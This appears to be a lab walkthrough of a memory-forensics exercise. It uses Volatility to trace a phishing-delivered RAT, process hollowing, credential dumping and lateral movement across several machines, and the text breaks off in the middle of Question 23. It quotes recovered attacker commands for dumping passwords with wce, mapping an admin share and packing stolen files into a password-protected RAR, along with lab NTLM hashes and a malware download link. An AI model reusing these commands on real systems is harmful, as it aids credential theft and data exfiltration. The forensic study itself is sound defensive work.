python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 memdump -p 3196 --dump-dir dump/files<br>Writing OUTLOOK.EXE [  3196] to 3196.dmp</pre><p>Strings:</p><pre>┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]<br>└─$ strings 3196.dmp | grep @outlook<br>                                                                                                             <br>┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]<br>└─$ strings 3196.dmp | grep @hotmail<br>                                                                                                             <br>┌──(zero㉿kali)-[~/Documents/volatility2/dump/files]<br>└─$ strings 3196.dmp | grep @gmail  <br>From: The Whit3R0s3 &lt;th3wh1t3r0s3@gmail.com&gt;<br>Return-Path: th3wh1t3r0s3@gmail.com</pre><h4>Question 2</h4><p>Machine:Target1 What is the filename that was delivered in the email?</p><h4>Answer 2</h4><p>Hedging a bet that the file is more than likely an .exe file, I used strings once again on the dmp file.</p><pre>$ strings 3196.dmp | grep .exe<br>&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;&gt;&lt;div dir=&quot;ltr&quot;&gt;Hello Mr. Wellick,&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;In order to provide the best service, in the most secure manner, AllSafe has recently updated our remote VPN software. Please download the update from the link below.&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;http://180.76.254.120/AnyConnectInstaller.exe&quot;&gt;http://180.76.254.120/AnyConnectInstaller.exe&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;If you have any questions please don&#39;t hesitate to contact IT support.&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;Thanks and have a great day!&lt;/div&gt;&lt;div&gt;AllSafe IT Support Desk&lt;/div&gt;&lt;/div&gt;</pre><p>Finding the above in the first couple of lines. An .exe file.</p><h4>Question 3</h4><p>Machine:Target1 What is the name of the rat’s family used by the attacker?</p><h4>Answer 3</h4><p>Now knowing what the .exe file is called I need to dump the file and upload it to VirusTotal. First of all I need to find the memory address:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep AnyConnectInstaller.exe              <br>Volatility Foundation Volatility Framework 2.6.1<br>0x000000003df12dd0      2      0 RW-rwd \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe<br>0x000000003df1cf00      4      0 R--r-d \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe<br>0x000000003e0bc5e0      7      0 R--r-d \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe<br>0x000000003e2559b0      8      0 R--rwd \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe<br>0x000000003e2ae8e0      8      0 RWD--- \Device\HarddiskVolume2\Users\anyconnect\AnyConnect\AnyConnectInstaller.exe<br>0x000000003ed57968      4      0 R--r-d \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe</pre><p>There are quite a few different options here. But the one in the downloads is truly what I am looking for, in other words the source file. There are however 3 of them, I just dumped each one to find a .dat file.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003e0bc5e0<br>ImageSectionObject 0x3e0bc5e0   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe<br>DataSectionObject 0x3e0bc5e0   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe</pre><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003ed57968<br>ImageSectionObject 0x3ed57968   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe<br>DataSectionObject 0x3ed57968   None   \Device\HarddiskVolume2\Users\frontdesk\Downloads\AnyConnectInstaller.exe</pre><p>Both of the above addresses worked. Giving me the .dat file which contains the data of the malware, which I can then upload to VirusTotal.</p><p>A small note, sometimes the answers to the questions regarding malware families can be a little miss leading. Since there are a TON of different names that are listed in VirusTotal. For example, this malware goes by the names:</p><pre>Xtrat<br>Seint<br>Bifrose<br>RATX<br>Buzus<br>Lydra<br>xtreme<br>trojan.dump/msil</pre><p>None of which are the answer, however knowing its a rat, xtrat and ratx are closest to what I need. In this case the answer is: XTREMERAT. Needless to say, I do not like these types of questions since the answer can be many different things depending on when you carry out the lab. For example, looking over 2 of the guides that are linked on the labs page have the answer given out by an anti virus vendor Webroot.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/398/1*dsmlJIEOmOradqHzjuQyaw.png" /><figcaption>Walkthrough 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/579/1*MaNYAl8qXnlWxyRKnZQ-PA.png" /><figcaption>Walkthrough 2</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/498/1*6R9xHRxqkEN8AHIiUgJBnQ.png" /><figcaption>My result</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aqFHu9RMod2X4Cdn-hK9kA.png" /><figcaption>Hybrid Analysis</figcaption></figure><h4>Question 4</h4><p>Machine:Target1 The malware appears to be leveraging process injection. What is the PID of the process that is injected?</p><h4>Answer 4</h4><p>I needed a little nudge in the right direction for this one, plus I learnt a new malware technique in the process. Process hollowing. I had to get a new plugin for Volatility for this, which can be found <a href="https://github.com/monnappa22/HollowFind/blob/master/hollowfind.py">here</a>, I then tried to find any suspicious process hollowing attempts within the system.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hollowfind<br>Hollowed Process Information:<br>        Process: wininit.exe PID: 420<br>        Parent Process: NA PPID: 360<br>        Creation Time: 2015-10-09 11:30:48 UTC+0000<br>        Process Base Name(PEB): wininit.exe<br>        Command Line(PEB): wininit.exe<br>        Hollow Type: No VAD Entry For Process Executable<br><br>VAD and PEB Comparison:<br>        Base Address(VAD): 0x0<br>        Process Path(VAD): NA<br>        Vad Protection: NA<br>        Vad Tag: NA<br><br>        Base Address(PEB): 0xcf0000<br>        Process Path(PEB): C:\Windows\system32\wininit.exe<br>        Memory Protection: PAGE_EXECUTE_WRITECOPY<br>        Memory Tag: Vad <br><br>        No Hexdump: Memory Unreadable at 0x00cf0000<br><br>Similar Processes:<br>        wininit.exe(420) Parent:NA(360) Start:2015-10-09 11:30:48 UTC+0000<br><br>Suspicious Memory Regions:<br>        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad <br>---------------------------------------------------<br><br>Hollowed Process Information:<br>        Process: iexplore.exe PID: 2996<br>        Parent Process: NA PPID: 2984<br>        Creation Time: 2015-10-09 11:31:27 UTC+0000<br>        Process Base Name(PEB): iexplore.exe<br>        Command Line(PEB): &quot;C:\Program Files\Internet Explorer\iexplore.exe&quot;<br>        Hollow Type: Process Base Address and Memory Protection Discrepancy<br><br>VAD and PEB Comparison:<br>        Base Address(VAD): 0x12d0000<br>        Process Path(VAD): \Program Files\Internet Explorer\iexplore.exe<br>        Vad Protection: PAGE_EXECUTE_WRITECOPY<br>        Vad Tag: Vad <br><br>        Base Address(PEB): 0x13400000<br>        Process Path(PEB): C:\Program Files\Internet Explorer\iexplore.exe<br>        Memory Protection: PAGE_READWRITE<br>        Memory Tag: VadS<br><br>0x13400000  4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00   MZP.............<br>0x13400010  b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00   ........@.......<br>0x13400020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................<br>0x13400030  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00   ................<br><br>Similar Processes:<br>        iexplore.exe(2996) Parent:NA(2984) Start:2015-10-09 11:31:27 UTC+0000<br><br>Suspicious Memory Regions:<br>        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad <br>---------------------------------------------------<br><br>Hollowed Process Information:<br>        Process: smss.exe PID: 276<br>        Parent Process: System PPID: 4<br>        Creation Time: 2015-10-09 11:30:44 UTC+0000<br>        Process Base Name(PEB): smss.exe<br>        Command Line(PEB): \SystemRoot\System32\smss.exe<br>        Hollow Type: No VAD Entry For Process Executable<br><br>VAD and PEB Comparison:<br>        Base Address(VAD): 0x0<br>        Process Path(VAD): NA<br>        Vad Protection: NA<br>        Vad Tag: NA<br><br>        Base Address(PEB): 0x48010000<br>        Process Path(PEB): \SystemRoot\System32\smss.exe<br>        Memory Protection: PAGE_EXECUTE_WRITECOPY<br>        Memory Tag: Vad <br><br>        No Hexdump: Memory Unreadable at 0x48010000<br><br>Similar Processes:<br>        smss.exe(276) Parent:System(4) Start:2015-10-09 11:30:44 UTC+0000<br><br>Suspicious Memory Regions:<br>        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad <br>---------------------------------------------------<br><br>Hollowed Process Information:<br>        Process: msdtc.exe PID: 1980<br>        Parent Process: services.exe PPID: 528<br>        Creation Time: 2015-10-09 11:30:55 UTC+0000<br>        Process Base Name(PEB): msdtc.exe<br>        Command Line(PEB): C:\Windows\System32\msdtc.exe<br>        Hollow Type: No VAD Entry For Process Executable<br><br>VAD and PEB Comparison:<br>        Base Address(VAD): 0x0<br>        Process Path(VAD): NA<br>        Vad Protection: NA<br>        Vad Tag: NA<br><br>        Base Address(PEB): 0xb40000<br>        Process Path(PEB): C:\Windows\System32\msdtc.exe<br>        Memory Protection: PAGE_EXECUTE_WRITECOPY<br>        Memory Tag: Vad <br><br>        No Hexdump: Memory Unreadable at 0x00b40000<br><br>Similar Processes:<br>        msdtc.exe(1980) Parent:services.exe(528) Start:2015-10-09 11:30:55 UTC+0000<br><br>Suspicious Memory Regions:<br>        0x771c0000(No PE/Possibly Code)  Protection: PAGE_EXECUTE_WRITECOPY  Tag: Vad <br>---------------------------------------------------</pre><p>There is one result in the list here that stands out from the rest. iexplore.exe, which is the Internet Explorer executable. The output notes: process base address and memory protection discrepancy, which after reading <a href="https://cysinfo.com/detecting-deceptive-hollowing-techniques/">this</a> article signaled to me I was on the right track.</p><p>Giving me the answer: PID 2996.</p><h4>Question 5</h4><p>Machine:Target1 What is the unique value the malware is using to maintain persistence after reboot?</p><h4>Answer 5</h4><p>When looking into malware maintaining persistence my first thought it looking into the registry keys. Going back to the VirusTotal results I can see that the malware sets the value MrRobot to be used on startup/reboot.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/676/1*Fs0ED1R4gtjqTO4IZBzzTg.png" /></figure><h4>Question 6</h4><p>Machine:Target1 Malware often uses a unique value or name to ensure that only one copy runs on the system. What is the unique name the malware is using?</p><h4>Answer 6</h4><p>Here I was looking for any type of mutated file name, one that would be different from the injected process from the previous question. There is a section on VirusTotal for this and it showed the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/487/1*m6hnB2Hcmu7ipSyG2c1fJg.png" /></figure><p>Instantly, fsociety0.dat stood out. There is another way of doing this, using Volatility. Using handles:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 handles -p 2996 | grep Mutant<br>Volatility Foundation Volatility Framework 2.6.1<br>0x85c80238   2996       0x18   0x1f0001 Mutant           <br>0x8560f0c0   2996       0xa4   0x100000 Mutant           RasPbFile<br>0x85d1be20   2996       0xe4   0x1f0001 Mutant           <br>0x85d1bd90   2996       0xec   0x1f0001 Mutant           <br>0x85d11500   2996      0x118   0x1f0001 Mutant           <br>0x85d118d0   2996      0x124   0x1f0001 Mutant           <br>0x85d1b0f0   2996      0x14c   0x1f0001 Mutant           <br>0x85d11700   2996      0x150   0x1f0001 Mutant           fsociety0.dat<br>0x85c76b80   2996      0x36c   0x1f0001 Mutant           ZonesCounterMutex<br>0x85c73da8   2996      0x3ac   0x1f0001 Mutant           ZoneAttributeCacheCounterMutex<br>0x85c81270   2996      0x3b4   0x1f0001 Mutant           ZonesCacheCounterMutex<br>0x85c73da8   2996      0x3b8   0x1f0001 Mutant           ZoneAttributeCacheCounterMutex<br>0x85928fe0   2996      0x3bc   0x1f0001 Mutant           ZonesLockedCacheCounterMutex<br>0x83e99318   2996      0x588   0x1f0001 Mutant           <br>0x83fc4450   2996      0x5b4   0x1f0001 Mutant           TeamViewerHooks_LogBuffer<br>0x84016860   2996      0x5b8   0x1f0001 Mutant           TeamViewerHooks_Mutex4<br>0x84009200   2996      0x5bc   0x1f0001 Mutant           TeamViewerHooks_Mutex1<br>0x8402ca90   2996      0x5c4   0x1f0001 Mutant           TeamViewerHooks_Mutex5<br>0x84015b98   2996      0x5d4   0x1f0001 Mutant           TeamViewerHooks_DynamicMemMutex<br>0x84015b38   2996      0x5d8   0x1f0001 Mutant           TeamViewerHooks_DirectXBufferMutex</pre><h4>Question 7</h4><p>Machine:Target1 It appears that a notorious hacker compromised this box before our current attackers. Name the movie he or she is from.</p><h4>Answer 7</h4><p>The easiest way I have found when looking for usernames in a system image, is using the following command:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep User </pre><p>Using grep to only grab entries with User in them, means that you are likely to uncover file structures for each user on the system.</p><pre>\Device\HarddiskVolume2\Users\zerocool\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini</pre><h4>Question 8</h4><p>Machine:Target1 What is the NTLM password hash for the administrator account?</p><h4>Answer 8</h4><p>This one took quite a bit of doing. I had never installed the Crypto.hash plugin for Volatility before. But after smashing my head against my desk for 20 mins, I found <a href="https://github.com/volatilityfoundation/volatility/issues/771#issuecomment-986010062">THIS</a> to be the solution to getting it working.</p><p>Now on with the question at hand. Using the hashdump plugin, I got the following output:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hashdump <br>Volatility Foundation Volatility Framework 2.6.1<br>Administrator:500:aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82:::<br>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br>front-desk:1000:aad3b435b51404eeaad3b435b51404ee:2ae4c526659523d58350e4d70107fc11:::</pre><h4>Question 9</h4><p>Machine:Target1 The attackers appear to have moved over some tools to the compromised front desk host. How many tools did the attacker move?</p><h4>Answer 9</h4><p>Checking the Windows Temp folder location is always a good start:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep &#39;\\Windows\\Temp\\&#39;<br>Volatility Foundation Volatility Framework 2.6.1<br>0x000000003df31038      8      0 R--r-- \Device\HarddiskVolume2\Windows\Temp\wce.exe<br>0x000000003e1eee10      7      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\getlsasrvaddr.exe<br>0x000000003e25eca8      5      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\wce.exe<br>0x000000003eca37f8      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\w.tmp<br>0x000000003fa633f0      1      0 R--rw- \Device\HarddiskVolume2\Windows\Temp\Rar.exe<br>0x000000003fc3fb80      6      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\nbtscan.exe<br>0x000000003fc5af80      7      0 R--r-d \Device\HarddiskVolume2\Windows\Temp\Rar.exe<br>0x000000003fcaa598      8      0 -W-rw- \Device\HarddiskVolume2\Windows\Temp\MpCmdRun.log<br>0x000000003fdb7808      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\nbs.txt<br>0x000000003fdd4ca0      7      0 R--r-- \Device\HarddiskVolume2\Windows\Temp\nbtscan.exe</pre><p>A few .exe files here. After looking up each of them individually, I narrowed it down to the following:</p><pre>wce.exe<br>getlsasrvaddr.exe<br>nbtscan.exe<br>Rar.exe</pre><p>wce.exe, is a windows credential editor which can add, change, list and delete associated credentials. Suspicious.</p><p>getlsasrvaddr.exe, is bundled with wce.exe, that automatiaclly obtains needed addresses for wce.exe. Suspicious.</p><p>nbtscan.exe is a NETBIOS nameserver scanner for local or remote TCP/IP connections. Suspicious.</p><p>Rar.exe, I am not sure. A little research maybe hinted at WinRar? The answer in the end was 3. So it either counted Rar.exe, or didn’t and had getlsasrvaddr.exe as a separate program. Pretty sure its the latter.</p><h4>Question 10</h4><p>Machine:Target1 What is the password for the front desk local administrator account?</p><h4>Answer 10</h4><p>First of all I need to grab the password hashes once again.</p><pre>└─$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 hashdump <br>Volatility Foundation Volatility Framework 2.6.1<br>Administrator:500:aad3b435b51404eeaad3b435b51404ee:79402b7671c317877b8b954b3311fa82:::<br>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::<br>front-desk:1000:aad3b435b51404eeaad3b435b51404ee:2ae4c526659523d58350e4d70107fc11:::</pre><p>Then using a <a href="https://hashes.com/en/decrypt/hash">simple online tool</a> I am able to grab the password:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/442/1*c-qaKZFA6_x32cphyaosHg.png" /></figure><h4>Question 11</h4><p>Machine:Target1 What is the std create data timestamp for the nbtscan.exe tool?</p><h4>Answer 11</h4><p>First I tried dumping the files and uploading them to VirusTotal to get a timestamp, which is normally quite reliable. It was created back in 2008, but this turned out not to be the answer.</p><p>So next I tried the timeliner plugin to see if it appears there. I made a note about this, but make sure you are piping in grep to grab specific results.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 timeliner | grep nbtscan<br>Volatility Foundation Volatility Framework 2.6.1<br>2015-10-09 10:45:12 UTC+0000|[SHIMCACHE]| \??\C:\Windows\Temp\nbtscan.exe| </pre><p>The question meant what time it was created on the system. Not when the file was first created.</p><h4>Question 12</h4><p>Machine:Target1 The attackers appear to have stored the output from the nbtscan.exe tool in a text file on a disk called nbs.txt. What is the IP address of the first machine in that file?</p><h4>Answer 12</h4><p>A pretty simple task, first make sure the file exists and grab its memory location, then dump the file.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 filescan | grep nbs.txt    <br>Volatility Foundation Volatility Framework 2.6.1<br>0x000000003fdb7808      8      0 -W-r-- \Device\HarddiskVolume2\Windows\Temp\nbs.txt<br><br>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 dumpfiles --dump-dir dump/files -Q 0x000000003fdb7808<br>Volatility Foundation Volatility Framework 2.6.1<br>DataSectionObject 0x3fdb7808   None   \Device\HarddiskVolume2\Windows\Temp\nbs.txt</pre><p>Once I had the .dat file, I copied the contents and threw it into CyberChef and used the From Hex function to get a human readable output.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mxhncn92SD8P0j7W5oiipQ.png" /></figure><h4>Question 13</h4><p>Machine:Target1 What is the full IP address and the port was the attacker’s malware using?</p><h4>Answer 13</h4><p>Knowing the malicious PID for iexplore.exe was 2996. A simple netscan told me all I needed to know:</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 netscan | grep 2996<br>Volatility Foundation Volatility Framework 2.6.1<br>0x3e0eedf8         TCPv4    10.1.1.20:49205                180.76.254.120:22    ESTABLISHED      2996     iexplore.exe </pre><h4>Question 14</h4><p>Machine:Target1 It appears the attacker also installed legit remote administration software. What is the name of the running process?</p><h4>Answer 14</h4><p>I had seen this name crop up a few times during different questions, but using pstree I was able to find its PID and other information about it.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 pstree | grep TeamViewer <br>Volatility Foundation Volatility Framework 2.6.1<br> 0x84013598:TeamViewer.exe                           2680   1696     28    632 2015-10-09 12:08:46 UTC+0000<br>. 0x858bc278:TeamViewer_Des                          1092   2680     16    405 2015-10-09 12:10:56 UTC+0000</pre><h4>Question 15</h4><p>Machine:Target1 It appears the attackers also used a built-in remote access method. What IP address did they connect to?</p><h4>Answer 15</h4><p>I know of a couple remote access methods that are built into Windows, one of which is Remote Desktop Connection, (RDP). An .exe file it uses is mstsc.exe, which shows up in the netscan results.</p><pre>$ python2 vol.py -f dump/target1.vmss --profile=Win7SP1x86_23418 netscan | grep mstsc<br>Volatility Foundation Volatility Framework 2.6.1<br>0x3fb7a560         TCPv4    10.1.1.20:49301                10.1.1.21:3389       ESTABLISHED      2844     mstsc.exe</pre><h4>Question 16</h4><p>Machine:Target2 It appears the attacker moved latterly from the front desk machine to the security admins (Gideon) machine and dumped the passwords. What is Gideon’s password?</p><h4>Answer 16</h4><p>So I had to reread this question, this isn’t the passwords that I have gotten in the past from using hashdump, this is the attackers dumping them into a file somewhere.</p><p>I tried cmdscan and the following output caught my interest:</p><pre>Cmd #0 at 0xe6030: cd C:\Users<br>Cmd #1 at 0xe6ea8: dir<br>Cmd #2 at 0xee3d0: wce.exe -w &gt; gideon/w.tmp</pre><p>Knowing wce.exe was used to grab passwords and such this was obviously the attacker placing its dumped results into a file called w.tmp. So next I used filescan to grab the memory location and extract the file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1011/1*7n1dNKl0LJn8kMpQ4g3XqA.png" /></figure><h4>Question 17</h4><p>Machine:Target2 Once the attacker gained access to “Gideon,” they pivoted to the AllSafeCyberSec domain controller to steal files. It appears they were successful. What password did they use?</p><h4>Answer 17</h4><p>I had the answer to this one looking at me in the face, however I was unfamiliar with WinRar’s switches and commands.</p><pre>$ python2 vol.py -f dump/target2.vmss --profile=Win7SP1x86_23418 consoles<br><br>CommandHistory: 0xe9198 Application: cmd.exe Flags: Allocated, Reset<br>CommandCount: 18 LastAdded: 17 LastDisplayed: 17<br>FirstCommand: 0 CommandCountMax: 50<br>ProcessHandle: 0x60<br>Cmd #0 at 0xe6030: cd C:\Users<br>Cmd #1 at 0xe6ea8: dir<br>Cmd #2 at 0xee3d0: wce.exe -w &gt; gideon/w.tmp<br>Cmd #3 at 0xe0170: who ami<br>Cmd #4 at 0xe0188: whoami<br>Cmd #5 at 0xea3c8: net use z: \\10.1.1.2\c$<br>Cmd #6 at 0xe01b8: cd z:<br>Cmd #7 at 0xe6ed8: dir<br>Cmd #8 at 0xe6070: cd gideon<br>Cmd #9 at 0xe6ef8: dir<br>Cmd #10 at 0xe6f08: z:<br>Cmd #11 at 0xe6f18: dir<br>Cmd #12 at 0xf2418: copy c:\users\gideon\rar.exe z:\crownjewels<br>Cmd #13 at 0xe0cb8: cd crownjewels<br>Cmd #14 at 0xe6f28: dir<br>Cmd #15 at 0xe6f38: rar<br>Cmd #16 at 0xf2478: rar crownjewlez.rar *.txt -hp123qwe!@#<br>Cmd #17 at 0xf24d0: rar a -hp123!@#qwe crownjewlez.rar *.txt</pre><p>So the above is the output from the consoles command, minus the unwanted stuff. Cmd line 16 creates the rar archive and sets the password.</p><h4>Question 18</h4><p>Machine:Target2 What was the name of the RAR file created by the attackers?</p><h4>Answer 18</h4><p>The code in the previous question lays out the answer for this one.</p><h4>Question 19</h4><p>Machine:Target2 How many files did the attacker add to the RAR archive?</p><h4>Answer 19</h4><p>This was a tough question. Knowing they used a wildcard to add all text files to the rar file wasn’t enough. Using memdump I got the memory from cmd.exe, the using the linux strings ultility I turned the .dmp file into a .txt. This however didn’t give me anything usable, it turns out you need some encoding when using strings. I used the following:</p><pre>$ strings -el 3048.dmp &gt; 3048.txt <br><br>$ cat 3048.txt | grep &#39;\\crownjewels\\&#39;| grep &quot;.txt&quot;<br>\crownjewels\SecretSauce2.txt<br>\crownjewels\SecretSauce1.txt<br>\crownjewels\SecretSauce3.txt</pre><p>Giving me the answer I was looking for.</p><h4>Question 20</h4><p>Machine:Target2 The attacker appears to have created a scheduled task on Gideon’s machine. What is the name of the file associated with the scheduled task?</p><h4>Answer 20</h4><p>My first port of call was to check the /Tasks/ folder in the Windows directory. While the output was quite large, there was one file that stood out to me, At1.job. After a quick search online, I found that it had its own <a href="https://attack.mitre.org/techniques/T1053/002/">MITRE ATT&amp;CK ID</a>, that talks about scheduled tasks. So I decided to dump the file and use CyberChef to decode the output for anything of interest.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/695/1*gAR_LhguHGyLTMFAbtmKrg.png" /></figure><p>Instantly c:\users\gidon\1.ba stood out to me. The text seems to be cut off, so I found the files location:</p><pre>$ python2 vol.py -f dump/target2.vmss --profile=Win7SP1x86_23418 filescan | grep &#39;\\gideon\\&#39;<br>Volatility Foundation Volatility Framework 2.6.1<br>0x000000003e027038      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Pictures\desktop.ini<br>0x000000003e1267a0      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\Rar.exe<br>0x000000003ec3d8e0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Links\desktop.ini<br>0x000000003f427e50      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\1.bat<br>0x000000003fa57d98      8      0 RWD--- \Device\HarddiskVolume2\Users\gideon\wce.exe<br>0x000000003fb36be8      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Saved Games\desktop.ini<br>0x000000003fb5fda0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Desktop\desktop.ini<br>0x000000003fb6ff80      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Documents\desktop.ini<br>0x000000003fb7bc38      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Contacts\desktop.ini<br>0x000000003fb906e0      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Music\desktop.ini<br>0x000000003fcaff50      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Favorites\desktop.ini<br>0x000000003fcf2798      8      0 -W-r-- \Device\HarddiskVolume2\Users\gideon\w.tmp<br>0x000000003fd05968      5      0 R--r-d \Device\HarddiskVolume2\Users\gideon\wce.exe<br>0x000000003fdba758      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Searches\desktop.ini<br>0x000000003fdbed38      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Videos\desktop.ini<br>0x000000003fdd4178      8      0 R--rwd \Device\HarddiskVolume2\Users\gideon\Downloads\desktop.ini</pre><p>It’s real name was 1.bat, which made more sense. Then after dump that I could see it was the file I was looking for.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/442/1*8FOYzDpHhbu7KcDlDQpvdA.png" /></figure><h4>Question 21</h4><p>Machine:POS What is the malware CNC’s server?</p><h4>Answer 21</h4><p>Knowing I am looking for any connections to do with iexplore.exe, a simple netscan gave me this:</p><pre>$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 netscan<br>0x3e135df8         TCPv4    10.1.1.10:58751                54.84.237.92:80      CLOSE_WAIT       3208     iexplore.exe </pre><h4>Question 22</h4><p>Machine:POS What is the common name of the malware used to infect the POS system?</p><h4>Answer 22</h4><p>So for this I know I needed to dump the iexplore.exe file from before. I used Malfind to get the PID and then dumped it via Malfind.</p><pre>$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 malfind -p 3208 -D dump/files<br>Volatility Foundation Volatility Framework 2.6.1<br>Process: iexplore.exe Pid: 3208 Address: 0x50000<br>Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE<br>Flags: CommitCharge: 11, MemCommit: 1, PrivateMemory: 1, Protection: 6<br><br>0x0000000000050000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............<br>0x0000000000050010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......<br>0x0000000000050020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................<br>0x0000000000050030  00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00   ................<br><br>0x0000000000050000 4d               DEC EBP<br>0x0000000000050001 5a               POP EDX<br>0x0000000000050002 90               NOP<br>0x0000000000050003 0003             ADD [EBX], AL<br>0x0000000000050005 0000             ADD [EAX], AL<br>0x0000000000050007 000400           ADD [EAX+EAX], AL<br>0x000000000005000a 0000             ADD [EAX], AL<br>0x000000000005000c ff               DB 0xff<br>0x000000000005000d ff00             INC DWORD [EAX]<br>0x000000000005000f 00b800000000     ADD [EAX+0x0], BH<br>0x0000000000050015 0000             ADD [EAX], AL<br>0x0000000000050017 004000           ADD [EAX+0x0], AL<br>0x000000000005001a 0000             ADD [EAX], AL<br>0x000000000005001c 0000             ADD [EAX], AL<br>0x000000000005001e 0000             ADD [EAX], AL<br>0x0000000000050020 0000             ADD [EAX], AL<br>0x0000000000050022 0000             ADD [EAX], AL<br>0x0000000000050024 0000             ADD [EAX], AL<br>0x0000000000050026 0000             ADD [EAX], AL<br>0x0000000000050028 0000             ADD [EAX], AL<br>0x000000000005002a 0000             ADD [EAX], AL<br>0x000000000005002c 0000             ADD [EAX], AL<br>0x000000000005002e 0000             ADD [EAX], AL<br>0x0000000000050030 0000             ADD [EAX], AL<br>0x0000000000050032 0000             ADD [EAX], AL<br>0x0000000000050034 0000             ADD [EAX], AL<br>0x0000000000050036 0000             ADD [EAX], AL<br>0x0000000000050038 0000             ADD [EAX], AL<br>0x000000000005003a 0000             ADD [EAX], AL<br>0x000000000005003c d800             FADD DWORD [EAX]<br>0x000000000005003e 0000             ADD [EAX], AL</pre><p>Then I uploaded it to VirusTotal.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*smZTY77Xb5vca5Tm99e1Lw.png" /></figure><h4>Question 23</h4><p>Machine:POS In the POS malware whitelist. What application was specific to Allsafecybersec?</p><h4>Answer 23</h4><p>So after a little research, this was something that had never crossed my mind. Malware having build in whitelists/blacklists. In order not to disrupt processes on a system to avoid protection and also targeted binaries/files for specific victims. In this case, running strings on the malware gave me the following:</p><pre>$ strings process.0x83f324d8.0x50000.dmp <br>!This 